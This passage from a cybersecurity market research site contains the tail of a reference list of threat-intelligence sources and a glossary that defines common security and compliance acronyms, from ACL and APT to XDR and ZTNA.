  5. Recorded Future --- ShadowPad malware analysis: https://www.recordedfuture.com/research/shadowpad-malware-analysis
  6. PwC Threat Intelligence --- ShadowPad technical report (2022): https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/shadow-pad.html
  7. LOLDrivers Project --- Vulnerable driver catalog: https://www.loldrivers.io/
  8. CrowdStrike Global Threat Report 2024: https://www.crowdstrike.com/global-threat-report/
  9. Mandiant APT Groups reference: https://www.mandiant.com/resources/insights/apt-groups
  10. Chainalysis --- Crypto hacking and stolen funds 2025: https://www.chainalysis.com/blog/crypto-hacking-stolen-funds-2025/
  11. LOLBAS Project --- Living Off The Land Binaries, Scripts and Libraries: https://lolbas-project.github.io/
  12. Fortra / Microsoft coordinated legal action against Cobalt Strike abuse (2023): https://www.fortra.com/newsroom/fortra-takes-legal-action-against-illegal-cobalt-strike-use

Glossary

This glossary defines the acronyms and key terms used throughout the cybersecurity market research site. Use it as a quick reference when navigating segment analyses, pain-point discussions, and opportunity assessments.

A

Term Definition
ACL Access Control List: rules determining which users/systems can access resources
APT Advanced Persistent Threat: a prolonged, targeted cyberattack where an intruder gains and maintains unauthorized access
ASM Attack Surface Management: continuous discovery, inventory, and risk assessment of an organization's external-facing assets
ASPM Application Security Posture Management: unified visibility and risk management across the application lifecycle
AV Antivirus: software designed to detect, prevent, and remove malware

B

Term Definition
BAS Breach and Attack Simulation: automated tools that simulate real-world attacks to test security controls
BEC Business Email Compromise: a social-engineering attack targeting employees with access to company finances or data
BYOVD Bring Your Own Vulnerable Driver: attack technique where adversaries load a legitimately signed but vulnerable kernel driver to disable security tools

C

Term Definition
C2 Command and Control: infrastructure used by attackers to communicate with compromised systems
CASB Cloud Access Security Broker: a security policy enforcement point between cloud consumers and providers
CCPA California Consumer Privacy Act: California state law granting consumers rights over their personal data
CIAM Customer Identity and Access Management: managing and securing external customer identities and authentication
CIEM Cloud Infrastructure Entitlement Management: managing identities and privileges in cloud environments
CNAPP Cloud-Native Application Protection Platform: integrated security for cloud-native applications across the full lifecycle
CSPM Cloud Security Posture Management: continuous monitoring of cloud infrastructure for misconfigurations and compliance risks
CTEM Continuous Threat Exposure Management: a program for continuously assessing and prioritizing threat exposures
CVE Common Vulnerabilities and Exposures: a standardized identifier for publicly known cybersecurity vulnerabilities
CWPP Cloud Workload Protection Platform: security for workloads running in cloud environments (VMs, containers, serverless)

D

Term Definition
DAST Dynamic Application Security Testing: testing a running application for vulnerabilities by simulating attacks
DCS Distributed Control System: a control system for managing industrial processes across multiple locations
DLP Data Loss Prevention: tools and processes to prevent unauthorized data exfiltration or leakage
DORA Digital Operational Resilience Act: EU regulation on ICT risk management for financial entities
DSPM Data Security Posture Management: discovering, classifying, and protecting sensitive data across cloud environments

E

Term Definition
EASM External Attack Surface Management: discovering and monitoring internet-facing assets for exposures
EDR Endpoint Detection and Response: tools that monitor endpoints for threats and provide investigation and response capabilities
EPP Endpoint Protection Platform: integrated endpoint security combining prevention, detection, and response

F/G

Term Definition
FAIR Factor Analysis of Information Risk: a quantitative model for understanding, analyzing, and measuring information risk
GRC Governance, Risk, and Compliance: integrated framework for aligning IT with business goals, managing risk, and meeting regulations
GDPR General Data Protection Regulation: EU regulation on data protection and privacy for individuals

H

Term Definition
HIPAA Health Insurance Portability and Accountability Act: US law governing the privacy and security of health information

I

Term Definition
IAB Initial Access Broker: specialized cybercriminals who compromise networks and sell access to ransomware operators and other buyers
IAM Identity and Access Management: framework for managing digital identities and controlling access to resources
ICS Industrial Control System: control systems used in industrial production and critical infrastructure
IDS Intrusion Detection System: a system that monitors network traffic for suspicious activity and alerts
IoT Internet of Things: network of physical devices embedded with sensors, software, and connectivity
IPS Intrusion Prevention System: a system that monitors and actively blocks detected threats in network traffic
ITDR Identity Threat Detection and Response: detecting and responding to identity-based attacks and compromises

L

Term Definition
LOLBin Living Off the Land Binary: a legitimate system binary that can be abused by attackers for malicious purposes such as downloading payloads, executing code, or bypassing security controls
LOTL Living Off the Land: attack technique using legitimate, pre-installed system tools and binaries rather than custom malware to evade detection

M

Term Definition
MaaS Malware-as-a-Service: cybercrime business model where malware developers sell or rent their tools to other criminals
MDR Managed Detection and Response: outsourced security service providing 24/7 threat monitoring, detection, and response
MFA Multi-Factor Authentication: requiring two or more verification factors to gain access to a resource
MITRE ATT&CK MITRE Adversarial Tactics, Techniques, and Common Knowledge: a knowledge base of adversary behaviors and techniques
MSSP Managed Security Service Provider: a third-party provider offering outsourced monitoring and management of security devices

N

Term Definition
NDR Network Detection and Response: detecting and responding to threats by analyzing network traffic patterns
NERC CIP North American Electric Reliability Corporation Critical Infrastructure Protection: security standards for the electric grid
NGAV Next-Generation Antivirus: advanced antivirus using behavioral analysis, AI, and machine learning beyond signature-based detection
NIS2 Network and Information Systems Directive 2: updated EU directive on cybersecurity for essential and important entities
NIST CSF National Institute of Standards and Technology Cybersecurity Framework: a voluntary framework for managing cybersecurity risk

O

Term Definition
ORB Operational Relay Box: compromised network devices (typically SOHO routers or IoT devices) used by threat actors as proxy infrastructure for command and control traffic
OT Operational Technology: hardware and software that monitors and controls physical devices and processes
OWASP Open Worldwide Application Security Project: a nonprofit focused on improving software security through open-source projects and guidance

P

Term Definition
PAM Privileged Access Management: securing, managing, and monitoring privileged accounts and access
PCI DSS Payment Card Industry Data Security Standard: security standards for organizations that handle credit card data
PII Personally Identifiable Information: any data that could identify a specific individual
PLC Programmable Logic Controller: an industrial computer used to control manufacturing processes

R

Term Definition
RaaS Ransomware-as-a-Service: cybercrime business model where ransomware operators provide malware and infrastructure to affiliates who conduct attacks, splitting profits
RGB Reconnaissance General Bureau: North Korea's primary intelligence agency responsible for clandestine operations including cyber operations

S

Term Definition
SASE Secure Access Service Edge: converged network and security-as-a-service architecture delivered from the cloud
SAST Static Application Security Testing: analyzing source code for vulnerabilities without executing the application
SBOM Software Bill of Materials: a formal inventory of components, libraries, and dependencies in a software product
SCA Software Composition Analysis: identifying open-source components and known vulnerabilities in a codebase
SCADA Supervisory Control and Data Acquisition: a system for monitoring and controlling industrial processes remotely
SD-WAN Software-Defined Wide Area Network: a virtual WAN architecture that simplifies branch networking and optimizes traffic
SEG Secure Email Gateway: a solution that filters inbound and outbound email to block threats and enforce policies
SIEM Security Information and Event Management: aggregating and analyzing log data for threat detection and compliance
SOAR Security Orchestration, Automation, and Response: tools that automate and coordinate security operations workflows
SOC Security Operations Center: a centralized team and facility for monitoring, detecting, and responding to security incidents
SOX Sarbanes-Oxley Act: US law mandating financial reporting and internal control requirements for public companies
SSE Security Service Edge: the security component of SASE, delivering SWG, CASB, and ZTNA as cloud services
SWG Secure Web Gateway: a solution that filters web traffic to enforce security policies and block threats

T

Term Definition
TAM Total Addressable Market: the total revenue opportunity available for a product or service
TCO Total Cost of Ownership: the complete cost of acquiring, deploying, and operating a solution over its lifetime
TIP Threat Intelligence Platform: a system for aggregating, correlating, and operationalizing threat intelligence data
TLS Transport Layer Security: a cryptographic protocol that provides secure communication over a network
TTP Tactics, Techniques, and Procedures: the patterns of behavior and methods used by threat actors to conduct cyber operations

V

Term Definition
VM Vulnerability Management: the ongoing process of identifying, evaluating, treating, and reporting security vulnerabilities

X

Term Definition
XDR Extended Detection and Response: unified threat detection and response across endpoints, network, cloud, and email

Z

Term Definition
ZTNA Zero Trust Network Access: a security model that grants access based on identity verification and least-privilege principles